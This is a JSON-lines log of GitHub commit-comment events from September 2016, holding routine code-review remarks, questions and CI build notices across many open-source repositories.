{"id":"4609673935","type":"CommitCommentEvent","actor":{"login":"andry-tino"},"repo":{"name":"andry-tino/inet"},"payload":{"comment":{"id":19149370,"position":26,"line":200,"path":"src/inet/linklayer/ieee80211ac/mac/MuEnabledDcfUpperMac.cc","commit_id":"232d367fae512cc4ccb216c67ed30f6369d725b5","created_at":"2016-09-23T16:50:55Z","updated_at":"2016-09-23T16:50:55Z","body":"Here we override the whole logic. Duplication introduced, but it is ok as we do not want to touch the original classes."}},"created_at":"2016-09-23T16:50:55Z"}
{"id":"4609678518","type":"CommitCommentEvent","actor":{"login":"Arcanemagus"},"repo":{"name":"AtomLinter/linter-puppet-lint"},"payload":{"comment":{"id":19149375,"position":null,"line":null,"path":null,"commit_id":"f7e716cb1d37df343f6460dc2a849d729f980985","created_at":"2016-09-23T16:51:52Z","updated_at":"2016-09-23T16:51:52Z","body":"It was added in https://github.com/steelbrain/linter/pull/1101, which looks like it's only supported in the v2 rewrite (the concept of this attribute was added early on, so it's supported for v1 messages)."}},"created_at":"2016-09-23T16:51:52Z"}
{"id":"4609679545","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19149381,"position":null,"line":null,"path":null,"commit_id":"f4eb0447f0b6ae843b22a19fe2b717cb90afd619","created_at":"2016-09-23T16:52:05Z","updated_at":"2016-09-23T16:52:05Z","body":"for_cbes (YixingChen) - x86_64-MacOS-10.10-clang: OK (2392 of 2447 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f4eb0447f0b6ae843b22a19fe2b717cb90afd619-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f4eb0447f0b6ae843b22a19fe2b717cb90afd619-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.75%25-yellow.svg)</a> \n"}},"created_at":"2016-09-23T16:52:05Z"}
{"id":"4609680027","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19149383,"position":null,"line":null,"path":null,"commit_id":"611e7cdec17edb3234063393cec58447019c88ca","created_at":"2016-09-23T16:52:10Z","updated_at":"2016-09-23T16:52:10Z","body":"++"}},"created_at":"2016-09-23T16:52:10Z"}
{"id":"4609684925","type":"CommitCommentEvent","actor":{"login":"PoisonNinja"},"repo":{"name":"PoisonNinja/iris"},"payload":{"comment":{"id":19149399,"position":null,"line":null,"path":null,"commit_id":"fd18f1c370f8a2b6f200b77823f68bc72c94070f","created_at":"2016-09-23T16:53:08Z","updated_at":"2016-09-23T16:53:08Z","body":"Fixed in a later commit. I tried to preserve the original links on the README, but links in the code to repositories were updated."}},"created_at":"2016-09-23T16:53:08Z"}
{"id":"4609685532","type":"CommitCommentEvent","actor":{"login":"midenok"},"repo":{"name":"natsys/mariadb_10.2"},"payload":{"comment":{"id":19149400,"position":null,"line":null,"path":null,"commit_id":"e0ef1e342c44bfd1adbe897f024f495451189586","created_at":"2016-09-23T16:53:15Z","updated_at":"2016-09-23T16:53:15Z","body":"Yes, you can. Please, also cherry-pick the commit into natsys/upstream."}},"created_at":"2016-09-23T16:53:15Z"}
{"id":"4609686458","type":"CommitCommentEvent","actor":{"login":"nelsonsilva"},"repo":{"name":"nuxeo/nuxeo-web-ui"},"payload":{"comment":{"id":19149403,"position":4,"line":319,"path":"app/elements/nuxeo-app/nuxeo-app.html","commit_id":"f33a4de0abdb3f95c58debc61c5033c56f0c9427","created_at":"2016-09-23T16:53:26Z","updated_at":"2016-09-23T16:53:26Z","body":"should be `[[urlFor('search', 'default')]]` and we could introduce a \"search\" named router"}},"created_at":"2016-09-23T16:53:26Z"}
{"id":"4609688416","type":"CommitCommentEvent","actor":{"login":"stephensmalley"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19149408,"position":14,"line":29,"path":"libselinux/src/procattr.c","commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T16:53:51Z","updated_at":"2016-09-23T16:53:51Z","body":"Isn't ANDROID defined for the target?  Your #ifndef HOST stuff is to disable on the build host only, not the target.  Maybe BUILD_HOST"}},"created_at":"2016-09-23T16:53:51Z"}
{"id":"4609689104","type":"CommitCommentEvent","actor":{"login":"sagarshah1729"},"repo":{"name":"ishubhamsingh/android_manifest"},"payload":{"comment":{"id":19149410,"position":null,"line":null,"path":null,"commit_id":"cb99b0484ca105edc09261ffd5eb121646fd1e85","created_at":"2016-09-23T16:53:59Z","updated_at":"2016-09-23T16:53:59Z","body":"Ohh I didn't saw it.."}},"created_at":"2016-09-23T16:53:59Z"}
{"id":"4609690016","type":"CommitCommentEvent","actor":{"login":"nelsonsilva"},"repo":{"name":"nuxeo/nuxeo-web-ui"},"payload":{"comment":{"id":19149412,"position":17,"line":320,"path":"app/elements/nuxeo-app/nuxeo-app.html","commit_id":"654ff81c7cce1a4322b42ba1c7434c7788039b57","created_at":"2016-09-23T16:54:11Z","updated_at":"2016-09-23T16:54:11Z","body":"should be `route=\"search:default\"` when a \"search\" route is introduced"}},"created_at":"2016-09-23T16:54:11Z"}
{"id":"4609695225","type":"CommitCommentEvent","actor":{"login":"midenok"},"repo":{"name":"natsys/mariadb_10.2"},"payload":{"comment":{"id":19149425,"position":null,"line":null,"path":null,"commit_id":"e0ef1e342c44bfd1adbe897f024f495451189586","created_at":"2016-09-23T16:55:13Z","updated_at":"2016-09-23T16:55:13Z","body":"But first, I would suggest you to scan MariaDB bugs to find correct patch and pull if it exists, rather making yours."}},"created_at":"2016-09-23T16:55:13Z"}
{"id":"4609699420","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19149438,"position":null,"line":null,"path":null,"commit_id":"4ff49bfc6201ad433b804d2cc3436dfecaed8d36","created_at":"2016-09-23T16:56:08Z","updated_at":"2016-09-23T16:56:08Z","body":"Also see [Changes to setenv-android.sh; make GNU libstdc++ default](http://groups.google.com/forum/#!topic/cryptopp-users/6M7WC1Thlzw) on the mailing list."}},"created_at":"2016-09-23T16:56:08Z"}
{"id":"4609700287","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19149441,"position":null,"line":null,"path":null,"commit_id":"e221eedc7a984d5698d44a67a8a5bfb73b774ead","created_at":"2016-09-23T16:56:18Z","updated_at":"2016-09-23T16:56:18Z","body":"Also see [Changes to setenv-android.sh; make GNU libstdc++ default](http://groups.google.com/forum/#!topic/cryptopp-users/6M7WC1Thlzw) on the mailing list."}},"created_at":"2016-09-23T16:56:18Z"}
{"id":"4609700999","type":"CommitCommentEvent","actor":{"login":"PoisonNinja"},"repo":{"name":"PoisonNinja/iris"},"payload":{"comment":{"id":19149443,"position":null,"line":null,"path":null,"commit_id":"fd18f1c370f8a2b6f200b77823f68bc72c94070f","created_at":"2016-09-23T16:56:27Z","updated_at":"2016-09-23T16:56:27Z","body":"On a side note, how well does QEMU work on WSL?"}},"created_at":"2016-09-23T16:56:27Z"}
{"id":"4609704877","type":"CommitCommentEvent","actor":{"login":"windbender"},"repo":{"name":"andsel/moquette"},"payload":{"comment":{"id":19149452,"position":13,"line":96,"path":"broker/src/main/java/io/moquette/spi/IMessagesStore.java","commit_id":"4d637a349b78497243a51c7f312a8cd184588165","created_at":"2016-09-23T16:57:16Z","updated_at":"2016-09-23T16:57:16Z","body":"I would suggest AtomicInteger over \"synchronized\" as this will be more performant to the best of my understanding.    (AtomicInteger is  java >= 1.7 ).\r\n\r\nThat said, be sure to read the primitive operations on AtomicInteger before implementation.   This SO thread lays out some of the critical details to implement a proper pattern for the .compareAndSet() operation:\r\n\r\nhttp://stackoverflow.com/questions/23137112/how-should-i-use-atomicinteger-as-a-reference-counter-to-manage-some-resource\r\n\r\nFWIW, I'm not 100% familiar with the use case here, but it may be that this following would be sufficient:\r\n\r\nhttps://docs.oracle.com/javase/7/docs/api/java/util/concurrent/atomic/AtomicInteger.html#decrementAndGet()\r\n\r\nI think this would be true IF and ONLY IF, once the decrements start, it is guaranteed there would be no further increments.\r\n"}},"created_at":"2016-09-23T16:57:16Z"}
{"id":"4609706582","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19149456,"position":4,"line":0,"path":"js/js.translator/testData/kotlin_lib.js","commit_id":"29b19eea6895d61ad143224e4705c0d4c007e26d","created_at":"2016-09-23T16:57:39Z","updated_at":"2016-09-23T16:57:39Z","body":"А так можно? Написать на котлине реализацию, а потом использовать ее для `@library`-деклараций?"}},"created_at":"2016-09-23T16:57:39Z"}
{"id":"4609706945","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19149457,"position":null,"line":null,"path":null,"commit_id":"d32d49c3b09b13aa68a95f47251bf788652e28cc","created_at":"2016-09-23T16:57:44Z","updated_at":"2016-09-23T16:57:44Z","body":"Also see [Changes to setenv-android.sh; make GNU libstdc++ default](http://groups.google.com/forum/#!topic/cryptopp-users/6M7WC1Thlzw) on the mailing list."}},"created_at":"2016-09-23T16:57:44Z"}
{"id":"4609707508","type":"CommitCommentEvent","actor":{"login":"sethp-jive"},"repo":{"name":"openzipkin/zipkin"},"payload":{"comment":{"id":19149458,"position":58,"line":55,"path":"zipkin-autoconfigure/storage-elasticsearch-aws/src/main/java/zipkin/autoconfigure/storage/elasticsearch/aws/AwsSignatureInterceptor.java","commit_id":"58fa61a78af904dd775dff571e930f95b4e78815","created_at":"2016-09-23T16:57:50Z","updated_at":"2016-09-23T16:57:50Z","body":"I'm a little nervous about this as the `AWS4Signer` is not marked `@ThreadSafe` – and indeed, it's very unsafe if its setters are called concurrently with calls to `sign`. I didn't dig in too much to the actual `sign` implementation to see if there was any other trouble with concurrency because the allocation cost seemed small & from what I could find most of the examples seem to create a new signer per request."}},"created_at":"2016-09-23T16:57:50Z"}
{"id":"4609711598","type":"CommitCommentEvent","actor":{"login":"jennifergarcia"},"repo":{"name":"swagger-api/swagger-core"},"payload":{"comment":{"id":19149474,"position":null,"line":null,"path":null,"commit_id":"964ff7c2dcd8169005995e40a0269124f89d90bc","created_at":"2016-09-23T16:58:42Z","updated_at":"2016-09-23T16:58:42Z","body":"Any idea when there is going to be a tagged release with this fix?"}},"created_at":"2016-09-23T16:58:42Z"}
{"id":"4609712064","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19149475,"position":null,"line":null,"path":null,"commit_id":"193983c620afcf4896ae258523743c79520fdf73","created_at":"2016-09-23T16:58:47Z","updated_at":"2016-09-23T16:58:47Z","body":"Also see [Issue 302](http://github.com/weidai11/cryptopp/issues/302)"}},"created_at":"2016-09-23T16:58:47Z"}
{"id":"4609713329","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19149478,"position":58,"line":0,"path":"libraries/stdlib/test/collections/ArraysTest.kt","commit_id":"29b19eea6895d61ad143224e4705c0d4c007e26d","created_at":"2016-09-23T16:59:04Z","updated_at":"2016-09-23T16:59:04Z","body":"Тогда нужно будет завести объект с предсказуемым хешкодом, но это можно."}},"created_at":"2016-09-23T16:59:04Z"}
{"id":"4609714804","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19149482,"position":null,"line":null,"path":null,"commit_id":"792ded802743830044198d2f525bded1f1c0bfb6","created_at":"2016-09-23T16:59:21Z","updated_at":"2016-09-23T16:59:21Z","body":"@juliabackports along with https://github.com/JuliaLang/julia/pull/18634"}},"created_at":"2016-09-23T16:59:21Z"}
{"id":"4609722900","type":"CommitCommentEvent","actor":{"login":"adamlucz90"},"repo":{"name":"adamlucz90/RecordmateAngular"},"payload":{"comment":{"id":19149500,"position":7,"line":14,"path":"api/controllers/authenticate.js","commit_id":"77f7debfc72434b5c2b652da8e1334a3a022142e","created_at":"2016-09-23T17:00:54Z","updated_at":"2016-09-23T17:00:54Z","body":"That makes sense.  It's fixed and will be updated in the next commit!"}},"created_at":"2016-09-23T17:00:54Z"}
{"id":"4609726162","type":"CommitCommentEvent","actor":{"login":"giuband"},"repo":{"name":"ffont/freesound-explorer"},"payload":{"comment":{"id":19149507,"position":11,"line":70,"path":"static/src/containers/SessionsHandler/actions.js","commit_id":"c2229745f025cb25d89cd5440e7476a95af0dbd2","created_at":"2016-09-23T17:01:32Z","updated_at":"2016-09-23T17:01:32Z","body":"you can further simplify the code here as:\r\n```\r\nconst sessionIDToLoad = sessionID || currentState.sessions.id;\r\nconst userIDToLoad = userID || 0;\r\n```"}},"created_at":"2016-09-23T17:01:32Z"}
{"id":"4609727655","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19149509,"position":13,"line":0,"path":"libraries/tools/kotlin-stdlib-gen/src/templates/Arrays.kt","commit_id":"119458c8d7d78cccffc71da543bf657bd412e681","created_at":"2016-09-23T17:01:49Z","updated_at":"2016-09-23T17:01:49Z","body":"было бы неплохо, но тут не только body отличается, а еще всякие свойства типа InlineOnly, JvmOnly.\nпока не напрягает, когда станет больше, можно подумать о рефакторинге"}},"created_at":"2016-09-23T17:01:49Z"}
{"id":"4609733977","type":"CommitCommentEvent","actor":{"login":"nursix"},"repo":{"name":"sahana/eden"},"payload":{"comment":{"id":19149519,"position":5,"line":1042,"path":"modules/s3/s3resource.py","commit_id":"3adc2fb21df191adcaab8a076cbf89f08a5c0876","created_at":"2016-09-23T17:03:08Z","updated_at":"2016-09-23T17:03:08Z","body":"fredagen den 23 september 2016 09.13.28 skrev  Fran Boon:\n> This still won't work with auth.override though...it requires us to use\n> s3_impersonate instead...potentially twice...a lot more overhead for no\n> real gain.\nI think you got this wrong ;) this change /eliminates/ the need for \nimpersonate - and auth.override.\n\nA back-end caller can simply specify approved_by=0 for anonymous approval \n(=your case), and front-end callers don't need impersonate because they are \nlogged in.\n\nThis means /less/ overheads, not more.\n"}},"created_at":"2016-09-23T17:03:08Z"}
{"id":"4609737852","type":"CommitCommentEvent","actor":{"login":"Tempurturtul"},"repo":{"name":"Tempurturtul/junior-dev"},"payload":{"comment":{"id":19149526,"position":null,"line":null,"path":null,"commit_id":"8e0054ea9700efae6bffd17a3f3909bdd449f01a","created_at":"2016-09-23T17:03:41Z","updated_at":"2016-09-23T17:03:41Z","body":"Correction - Resolves a portion of #6, but does not close it."}},"created_at":"2016-09-23T17:03:41Z"}
{"id":"4609738658","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"halogenOS/android_build"},"payload":{"comment":{"id":19149530,"position":8,"line":234,"path":"core/tasks/check_boot_jars/package_whitelist.txt","commit_id":"fcc4b2fc143062f8051ba81133d68ac41d69deab","created_at":"2016-09-23T17:03:51Z","updated_at":"2016-09-23T17:03:51Z","body":"Because we love typos"}},"created_at":"2016-09-23T17:03:51Z"}
{"id":"4609742053","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19149535,"position":91,"line":91,"path":"libselinux/Android.bp","commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T17:04:35Z","updated_at":"2016-09-23T17:04:35Z","body":"No android still is carrying the restorecon_last changes internally in android.c. I don't see a clear way to pull that apart completely at this time, since it requires \"skip paths\" over /data.\r\n\r\nI'm thinking a future task it use selabel_open() in android.c with SELABEL_OPT_DIGEST and use the selabel_digest() function to nab the results."}},"created_at":"2016-09-23T17:04:35Z"}
{"id":"4609745120","type":"CommitCommentEvent","actor":{"login":"phueper"},"repo":{"name":"js-joda/js-joda"},"payload":{"comment":{"id":19149547,"position":null,"line":null,"path":null,"commit_id":"c92d73407b4ddaac31e52916c27fdfde92084a86","created_at":"2016-09-23T17:05:14Z","updated_at":"2016-09-23T17:05:14Z","body":"Ups :blush:"}},"created_at":"2016-09-23T17:05:14Z"}
{"id":"4609745150","type":"CommitCommentEvent","actor":{"login":"tbjoern"},"repo":{"name":"hpi-swt2/wimi-portal"},"payload":{"comment":{"id":19149548,"position":null,"line":null,"path":null,"commit_id":"1d429ecb7853c700f277d40bd146eede8b4e7cc3","created_at":"2016-09-23T17:05:15Z","updated_at":"2016-09-23T17:05:15Z","body":"the position attribute could be set to \"sticky\", this should work similarly. This is an experimental feature however and most browsers dont support it yet, unless you enable it specifically"}},"created_at":"2016-09-23T17:05:15Z"}
{"id":"4609748567","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JunoLab/Juno.jl"},"payload":{"comment":{"id":19149556,"position":null,"line":null,"path":null,"commit_id":"a076c6d5c3c64d624b96e8731739ffcf271f4432","created_at":"2016-09-23T17:05:57Z","updated_at":"2016-09-23T17:05:57Z","body":"Do you want it to be installable on 0.4? If so, REQUIRE and CI needs updating to make that possible."}},"created_at":"2016-09-23T17:05:57Z"}
{"id":"4609750826","type":"CommitCommentEvent","actor":{"login":"flavour"},"repo":{"name":"sahana/eden"},"payload":{"comment":{"id":19149561,"position":5,"line":1042,"path":"modules/s3/s3resource.py","commit_id":"3adc2fb21df191adcaab8a076cbf89f08a5c0876","created_at":"2016-09-23T17:06:27Z","updated_at":"2016-09-23T17:06:27Z","body":"Ah yes, I missed the possibility to pass approved_by = 0\r\nOK, if you are happier with this then fine :)"}},"created_at":"2016-09-23T17:06:27Z"}
{"id":"4609753751","type":"CommitCommentEvent","actor":{"login":"edalzell"},"repo":{"name":"edalzell/mailchimp"},"payload":{"comment":{"id":19149567,"position":null,"line":null,"path":null,"commit_id":"0e63c71f99342effaa6050d823bce55f4e9e6896","created_at":"2016-09-23T17:07:05Z","updated_at":"2016-09-23T17:07:05Z","body":"[Done](https://github.com/edalzell/mailchimp/commit/9b17577b0103215b5e1439c23abb5ab6b86bf4d1)"}},"created_at":"2016-09-23T17:07:05Z"}
{"id":"4609754678","type":"CommitCommentEvent","actor":{"login":"EllaQuimica"},"repo":{"name":"humitos/argentinaenpython.com"},"payload":{"comment":{"id":19149569,"position":null,"line":null,"path":null,"commit_id":"9ae771a21bb4f6341aa9f6c92432136f49e5ad2a","created_at":"2016-09-23T17:07:17Z","updated_at":"2016-09-23T17:07:17Z","body":"Actualizado a la version y diff:\r\ntutorial/en/deploy$ git diff f11f359bd3b1f044f33e5bd77ff796fc17670f7c .\r\n\r\nComentarios: \r\nYa tenias los archivos de las imágenes github_get_repo_url_screenshot.png y new_github_repo.png. Lo que hice fue llamarlas en el archivo desplegar.rst "}},"created_at":"2016-09-23T17:07:17Z"}
{"id":"4609757464","type":"CommitCommentEvent","actor":{"login":"Arduinounoc"},"repo":{"name":"Arduinounoc/Aruino"},"payload":{"comment":{"id":19149577,"position":null,"line":null,"path":null,"commit_id":"6a4c0c9aa61106c8f532855f2bf733593c780aa6","created_at":"2016-09-23T17:07:54Z","updated_at":"2016-09-23T17:07:54Z","body":"grappig plaatje he?"}},"created_at":"2016-09-23T17:07:54Z"}
{"id":"4609758680","type":"CommitCommentEvent","actor":{"login":"tbjoern"},"repo":{"name":"hpi-swt2/wimi-portal"},"payload":{"comment":{"id":19149580,"position":18,"line":26,"path":"app/views/time_sheets/_form.html.erb","commit_id":"eb4ca622607091929aba300f299c7894e74263dc","created_at":"2016-09-23T17:08:10Z","updated_at":"2016-09-23T17:08:10Z","body":"exactly. for the bootstrap layout to work it has to be a child element of the actions sidebar. i dont see an easy, clean way to do this without js."}},"created_at":"2016-09-23T17:08:10Z"}
{"id":"4609760335","type":"CommitCommentEvent","actor":{"login":"VzqzAc"},"repo":{"name":"VzqzAc/Marlyc"},"payload":{"comment":{"id":19149585,"position":null,"line":null,"path":null,"commit_id":"4b1c1411196afee424eae180fc994147e52cc657","created_at":"2016-09-23T17:08:31Z","updated_at":"2016-09-23T17:08:31Z","body":"I should have said 'unit tests' beside 'TDD' but well..."}},"created_at":"2016-09-23T17:08:31Z"}
{"id":"4609763222","type":"CommitCommentEvent","actor":{"login":"ayushmalik397"},"repo":{"name":"udacity/frontend-nanodegree-resume"},"payload":{"comment":{"id":19149596,"position":2,"line":2,"path":"js/resumeBuilder.js","commit_id":"2568049bd7e491ffb6e2641c8b6a6eaaa631dfb1","created_at":"2016-09-23T17:09:09Z","updated_at":"2016-09-23T17:09:09Z","body":" $(\"#main\").append(\"Charlie Chaplin\");\r\n"}},"created_at":"2016-09-23T17:09:09Z"}
{"id":"4609763664","type":"CommitCommentEvent","actor":{"login":"designorant"},"repo":{"name":"rnpm/rnpm"},"payload":{"comment":{"id":19149598,"position":null,"line":null,"path":null,"commit_id":"1db2a06850f8f727b5c68ab0f3450f140c24ac91","created_at":"2016-09-23T17:09:15Z","updated_at":"2016-09-23T17:09:15Z","body":"@bbodenmiller `react-native link`\r\n\r\nI've submitted some docs changes so it's less confusing:\r\n- https://github.com/facebook/react-native/pull/10069\r\n- https://github.com/react-native-community/react-native-elements/pull/46"}},"created_at":"2016-09-23T17:09:15Z"}
{"id":"4609769259","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"japanesemediamanager/jmmserver"},"payload":{"comment":{"id":19149614,"position":1,"line":1,"path":"JMMServer/JMMServiceImplementationImage.cs","commit_id":"8faa32f135b281728454adb36578ccacdea43403","created_at":"2016-09-23T17:10:28Z","updated_at":"2016-09-23T17:10:28Z","body":"This whole file is duped somewhere else"}},"created_at":"2016-09-23T17:10:28Z"}
{"id":"4609769585","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19149615,"position":null,"line":null,"path":null,"commit_id":"ccdfcd33ea202bf69a512dd712a38f1ebb169670","created_at":"2016-09-23T17:10:32Z","updated_at":"2016-09-23T17:10:32Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 261](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1225&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-23T17:10:32Z"}
{"id":"4609770918","type":"CommitCommentEvent","actor":{"login":"regalstreak"},"repo":{"name":"halogenOS/android_build"},"payload":{"comment":{"id":19149618,"position":8,"line":234,"path":"core/tasks/check_boot_jars/package_whitelist.txt","commit_id":"fcc4b2fc143062f8051ba81133d68ac41d69deab","created_at":"2016-09-23T17:10:49Z","updated_at":"2016-09-23T17:10:49Z","body":"*Becuase"}},"created_at":"2016-09-23T17:10:49Z"}
{"id":"4609771662","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"japanesemediamanager/jmmserver"},"payload":{"comment":{"id":19149621,"position":91,"line":2474,"path":"JMMServer/MainWindow.xaml.cs","commit_id":"8faa32f135b281728454adb36578ccacdea43403","created_at":"2016-09-23T17:11:00Z","updated_at":"2016-09-23T17:11:00Z","body":"This needs changed to Nancy"}},"created_at":"2016-09-23T17:11:00Z"}
{"id":"4609773118","type":"CommitCommentEvent","actor":{"login":"da3dsoul"},"repo":{"name":"japanesemediamanager/jmmserver"},"payload":{"comment":{"id":19149628,"position":134,"line":2580,"path":"JMMServer/MainWindow.xaml.cs","commit_id":"8faa32f135b281728454adb36578ccacdea43403","created_at":"2016-09-23T17:11:18Z","updated_at":"2016-09-23T17:11:18Z","body":"This needs changed to Nancy"}},"created_at":"2016-09-23T17:11:18Z"}
{"id":"4609779382","type":"CommitCommentEvent","actor":{"login":"schnello"},"repo":{"name":"schnello/volkszaehler.org"},"payload":{"comment":{"id":19149657,"position":null,"line":null,"path":null,"commit_id":"4543e3276cea01afb90a785f4c92abfeefc43ed3","created_at":"2016-09-23T17:12:38Z","updated_at":"2016-09-23T17:12:38Z","body":"Keine Ahnung. Kenne SouceTree nicht. Hier in Github wird alles so dargestellt wie üblich.\r\n\r\n\r\nGrüße"}},"created_at":"2016-09-23T17:12:38Z"}
{"id":"4609782431","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19149661,"position":20,"line":46,"path":"libselinux/src/callbacks.c","commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T17:13:18Z","updated_at":"2016-09-23T17:13:18Z","body":"I pull in check_context.c only on the target, in the old fork, it was pulled in for the host, which I see no point of. What would happen if I did have an selinux box I was building on, wouldn't it be checking the contexts against a currently loaded, non Android policy?"}},"created_at":"2016-09-23T17:13:18Z"}
{"id":"4609783539","type":"CommitCommentEvent","actor":{"login":"mtheall"},"repo":{"name":"sforshee/libfuse"},"payload":{"comment":{"id":19149664,"position":12,"line":1532,"path":"lib/fuse_lowlevel.c","commit_id":"1b917397ebbb41f6f61214078dcd0965f906133c","created_at":"2016-09-23T17:13:31Z","updated_at":"2016-09-23T17:13:31Z","body":"Segmentation fault if setacl is NULL."}},"created_at":"2016-09-23T17:13:31Z"}
{"id":"4609784496","type":"CommitCommentEvent","actor":{"login":"mtheall"},"repo":{"name":"sforshee/libfuse"},"payload":{"comment":{"id":19149665,"position":30,"line":1548,"path":"lib/fuse_lowlevel.c","commit_id":"1b917397ebbb41f6f61214078dcd0965f906133c","created_at":"2016-09-23T17:13:44Z","updated_at":"2016-09-23T17:13:44Z","body":"Segmentation fault if getacl is NULL."}},"created_at":"2016-09-23T17:13:44Z"}
{"id":"4609785643","type":"CommitCommentEvent","actor":{"login":"yasu80"},"repo":{"name":"CIR-KIT/fifth_robot_pkg"},"payload":{"comment":{"id":19149670,"position":null,"line":null,"path":null,"commit_id":"f6f657ed9206343b97e53378bf0ea232cf4d8eff","created_at":"2016-09-23T17:13:59Z","updated_at":"2016-09-23T17:13:59Z","body":"あっあっ(死亡)"}},"created_at":"2016-09-23T17:13:59Z"}
{"id":"4609786724","type":"CommitCommentEvent","actor":{"login":"tawheeler"},"repo":{"name":"sisl/BayesNets.jl"},"payload":{"comment":{"id":19149676,"position":4,"line":18,"path":"src/BayesNets.jl","commit_id":"35fda5b5baffc58c48e015a4f311b770c75ec8ef","created_at":"2016-09-23T17:14:13Z","updated_at":"2016-09-23T17:14:13Z","body":"perfect, thank you. There is a lot of git-fu to learn."}},"created_at":"2016-09-23T17:14:13Z"}
{"id":"4609786767","type":"CommitCommentEvent","actor":{"login":"mmalohlava"},"repo":{"name":"h2oai/sparkling-water"},"payload":{"comment":{"id":19149677,"position":null,"line":null,"path":null,"commit_id":"cd3673c5b15a9e9f487d56044c30437acb9f5f51","created_at":"2016-09-23T17:14:13Z","updated_at":"2016-09-23T17:14:13Z","body":"We should start to think about a strategy how to integrate this big pull request. "}},"created_at":"2016-09-23T17:14:13Z"}
{"id":"4609788545","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaGraphs/GraphPlot.jl"},"payload":{"comment":{"id":19149682,"position":null,"line":null,"path":null,"commit_id":"b56c91cfbbc4f12c7da2889477f21c13a4c5340f","created_at":"2016-09-23T17:14:35Z","updated_at":"2016-09-23T17:14:35Z","body":"If it gets imported, it should be an unconditional dependency or moved to a separate package, not loaded in a try catch."}},"created_at":"2016-09-23T17:14:35Z"}
{"id":"4609788690","type":"CommitCommentEvent","actor":{"login":"vipul-nextev"},"repo":{"name":"tanji/replication-manager"},"payload":{"comment":{"id":19149683,"position":null,"line":null,"path":null,"commit_id":"c2790c12547678953c16897efb24ed1cc1bd9e8e","created_at":"2016-09-23T17:14:37Z","updated_at":"2016-09-23T17:14:37Z","body":"Build is broken with this commit."}},"created_at":"2016-09-23T17:14:37Z"}
{"id":"4609791681","type":"CommitCommentEvent","actor":{"login":"mtheall"},"repo":{"name":"sforshee/libfuse"},"payload":{"comment":{"id":19149687,"position":42,"line":1570,"path":"lib/fuse_lowlevel.c","commit_id":"1b917397ebbb41f6f61214078dcd0965f906133c","created_at":"2016-09-23T17:15:14Z","updated_at":"2016-09-23T17:15:14Z","body":"Segmentation fault if setacl is NULL. This happens if you set FUSE_CAP_POSIX_ACL in the init callback but your ops don't have setacl."}},"created_at":"2016-09-23T17:15:14Z"}
{"id":"4609792440","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaGraphs/GraphPlot.jl"},"payload":{"comment":{"id":19149689,"position":null,"line":null,"path":null,"commit_id":"b56c91cfbbc4f12c7da2889477f21c13a4c5340f","created_at":"2016-09-23T17:15:23Z","updated_at":"2016-09-23T17:15:23Z","body":"Or you should change https://github.com/JuliaGraphs/GraphPlot.jl/blob/b56c91cfbbc4f12c7da2889477f21c13a4c5340f/src/GraphPlot.jl#L1 to `__precompile__(false)`. The LightGraphs import shouldn't be in a try-catch if it's mandatory."}},"created_at":"2016-09-23T17:15:23Z"}
{"id":"4609793868","type":"CommitCommentEvent","actor":{"login":"diraol"},"repo":{"name":"kytos/python-openflow"},"payload":{"comment":{"id":19149693,"position":8,"line":176,"path":"pyof/foundation/basic_types.py","commit_id":"3942f8d51c7e28c49d1436031a9d67cead0b7aa0","created_at":"2016-09-23T17:15:42Z","updated_at":"2016-09-23T17:15:42Z","body":"I think that we can insert here the default value of this field."}},"created_at":"2016-09-23T17:15:42Z"}
